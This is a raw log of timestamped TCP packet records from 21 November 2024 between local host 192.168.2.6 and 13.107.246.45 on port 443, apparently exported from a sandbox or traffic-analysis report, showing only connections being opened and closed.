                                                                                                                                                                              Nov 21, 2024 08:31:16.015199900 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.015219927 CET49916443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.015227079 CET4434991613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.022438049 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.022495985 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.022599936 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.022970915 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.022995949 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.211874008 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.214931011 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.215059042 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.215156078 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.215156078 CET49917443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.215204954 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.215234041 CET4434991713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.218405962 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.218524933 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.218632936 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.218755007 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.218780041 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.257914066 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.260921001 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.261003971 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.261030912 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.261065960 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.261256933 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.261256933 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.261256933 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.264533997 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.264569998 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.264645100 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.264785051 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.264799118 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:16.573950052 CET49918443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:16.573973894 CET4434991813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.498203039 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.498913050 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.498946905 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.499399900 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.499404907 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.600649118 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.601332903 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.601373911 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.601803064 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.601816893 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.810218096 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.810726881 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.810770035 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.811760902 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.811767101 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.937833071 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.938502073 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.938556910 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.938956022 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.938970089 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.943181038 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.946309090 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.946403980 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.946491003 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.946491957 CET49919443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.946542978 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.946573019 CET4434991913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.949297905 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.949330091 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:17.949409962 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.949547052 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:17.949557066 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.049637079 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.052850008 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.053005934 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.053072929 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.053072929 CET49920443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.053112984 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.053143024 CET4434992013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.055900097 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.055952072 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.056020021 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.056178093 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.056190968 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.117531061 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.118066072 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.118082047 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.118525028 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.118530035 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.255645990 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.258708954 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.258824110 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.258882046 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.258882046 CET49921443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.258913040 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.258924007 CET4434992113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.261831045 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.261861086 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.261967897 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.262137890 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.262151003 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.371756077 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.374365091 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.374444962 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.374470949 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.374537945 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.374608994 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.374608994 CET49922443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.374654055 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.374680996 CET4434992213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.377262115 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.377310991 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.377389908 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.377556086 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.377573013 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.571423054 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.574217081 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.574295044 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.574337006 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.574342012 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.574352980 CET49923443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.574357986 CET4434992313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.577043056 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.577120066 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:18.577197075 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.577358007 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:18.577387094 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.727654934 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.728122950 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:19.728144884 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.728588104 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:19.728594065 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.771327972 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.771792889 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:19.771820068 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:19.772233963 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:19.772239923 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.100752115 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.101250887 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.101275921 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.101867914 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.101874113 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.119596958 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.120111942 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.120130062 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.120528936 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.120532990 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.173402071 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.176435947 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.176486969 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.176487923 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.176539898 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.176592112 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.176613092 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.176729918 CET49924443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.176737070 CET4434992413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.179693937 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.179727077 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.179795980 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.179919004 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.179930925 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.205805063 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.208924055 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.208982944 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.209023952 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.209041119 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.209049940 CET49925443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.209054947 CET4434992513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.211285114 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.211394072 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.211479902 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.211604118 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.211632967 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.365343094 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.366002083 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.366036892 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.366456032 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.366468906 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.533233881 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.536808968 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.536866903 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.536894083 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.536911011 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.536921024 CET49927443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.536926031 CET4434992713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.539802074 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.539839983 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.539911032 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.540062904 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.540076017 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.571734905 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.575387955 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.575519085 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.575519085 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.575603008 CET49926443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.575615883 CET4434992613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.577910900 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.577944040 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.578006983 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.578167915 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.578185081 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.808382988 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.811476946 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.811580896 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.811614990 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.811688900 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.815931082 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.815984011 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.816014051 CET49928443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.816031933 CET4434992813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.818553925 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.818629980 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:20.818701982 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.818852901 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:20.818877935 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:21.964785099 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:21.966092110 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:21.966159105 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:21.966530085 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:21.966547012 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.056888103 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.057497025 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.057560921 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.057925940 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.057940006 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.265589952 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.266134024 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.266165972 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.266570091 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.266576052 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.296997070 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.297477961 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.297499895 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.297930956 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.297935963 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.409372091 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.412456036 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.412553072 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.412617922 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.412617922 CET49929443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.412656069 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.412683010 CET4434992913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.415112019 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.415147066 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.415224075 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.415493011 CET49934443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.415507078 CET4434993413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.510869026 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.513938904 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.514055967 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.514122963 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.514163971 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.514231920 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.515129089 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.515165091 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.515189886 CET49930443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.515204906 CET4434993013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.517684937 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.517726898 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.517791986 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.517926931 CET49935443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.517935038 CET4434993513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.669886112 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.670351982 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.670371056 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.670793056 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.670799017 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.700701952 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.703849077 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.703905106 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.703947067 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.703963995 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.703977108 CET49931443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.703983068 CET4434993113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.706404924 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.706439018 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.706499100 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.706621885 CET49936443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.706635952 CET4434993613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.730248928 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.733401060 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.733463049 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.733534098 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.733550072 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.733576059 CET49932443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.733581066 CET4434993213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.736449003 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.736548901 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:22.736632109 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.736767054 CET49937443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:22.736804008 CET4434993713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.122729063 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.125817060 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.125890017 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:23.129916906 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:23.129926920 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.129935980 CET49933443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:23.129946947 CET4434993313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.168911934 CET49938443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:23.168961048 CET4434993813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:23.169024944 CET49938443192.168.2.613.107.246.45
